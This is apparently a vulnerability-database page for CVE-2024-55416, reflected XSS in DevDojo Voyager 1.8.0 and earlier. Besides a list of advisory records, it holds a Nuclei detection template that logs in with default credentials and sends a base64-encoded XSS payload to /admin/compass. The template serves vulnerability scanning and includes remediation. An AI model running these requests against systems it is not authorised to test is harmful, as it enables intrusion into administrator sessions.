| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the Voyager PHP-framework Laravel, related to the lack of protection for website structure, allows attackers to perform cross-site scripting (XSS) attacks. | 31 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-55416 | 30 Jan 202515:15 | – | circl | |
| Voyager 安全漏洞 | 30 Jan 202500:00 | – | cnnvd | |
| CVE-2024-55416 | 30 Jan 202500:00 | – | cve | |
| CVE-2024-55416 | 30 Jan 202500:00 | – | cvelist | |
| EUVD-2025-0180 | 3 Oct 202520:07 | – | euvd | |
| DevDojo Voyager vulnerable to reflected Cross-site Scripting | 30 Jan 202515:31 | – | github | |
| CVE-2024-55416 | 30 Jan 202515:15 | – | nvd | |
| GHSA-MM49-4F2G-C3WF DevDojo Voyager vulnerable to reflected Cross-site Scripting | 30 Jan 202515:31 | – | osv | |
| PT-2025-1308 | 30 Jan 202500:00 | – | ptsecurity |
id: CVE-2024-55416
info:
name: DevDojo Voyager <=1.8.0 - Cross-Site Scripting
author: iamnoooob,rootxharsh,pdresearch
severity: low
description: |
DevDojo Voyager through version 1.8.0 is vulnerable to reflected XSS via /admin/compass. By manipulating an authenticated user to click on a link, arbitrary Javascript can be executed.
impact: |
Authenticated attackers can craft malicious links that execute arbitrary JavaScript in the context of an administrator's session when clicked, potentially leading to account compromise or privilege escalation.
remediation: |
Update DevDojo Voyager to version 1.8.1 or later to address the reflected XSS vulnerability.
reference:
- https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/
- https://github.com/thedevdojo/voyager/blob/1.6/resources/views/master.blade.php#L132
- https://github.com/thedevdojo/voyager/blob/1.6/src/Http/Controllers/VoyagerCompassController.php#L44
- https://nvd.nist.gov/vuln/detail/CVE-2024-55416
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N
cve-id: CVE-2024-55416
epss-score: 0.24095
epss-percentile: 0.97574
metadata:
verified: true
max-request: 4
shodan-query: title:"Voyager"
tags: cve,cve2024,devdojo,xss,authenticated,vuln
variables:
username: "[email protected]"
password: "password"
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: csrf
group: 1
regex:
- 'name="_token" value="([a-zA-Z0-9]+)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_token={{csrf}}&email={{username}}&password={{password}}&
matchers:
- type: dsl
dsl:
- "contains(body,'/admin</title>')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/compass?del=PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPi5sb2c= HTTP/1.1
Host: {{Hostname}}
redirects: false
matchers:
- type: dsl
dsl:
- "contains(location,'/admin/compass')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/compass?logs=true HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body,'Successfully deleted log file: <img src=x onerror=alert(1)>.log')"
- "status_code == 200"
condition: and
# digest: 4a0a00473045022015474159726b67c6374ffb32c9d73779d4952e7c160933d8091ec4f5be74577302210098b66fd0e943d62949e5d86a43d70d520235ec268e9ff46d874f0cb0f8a07039:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation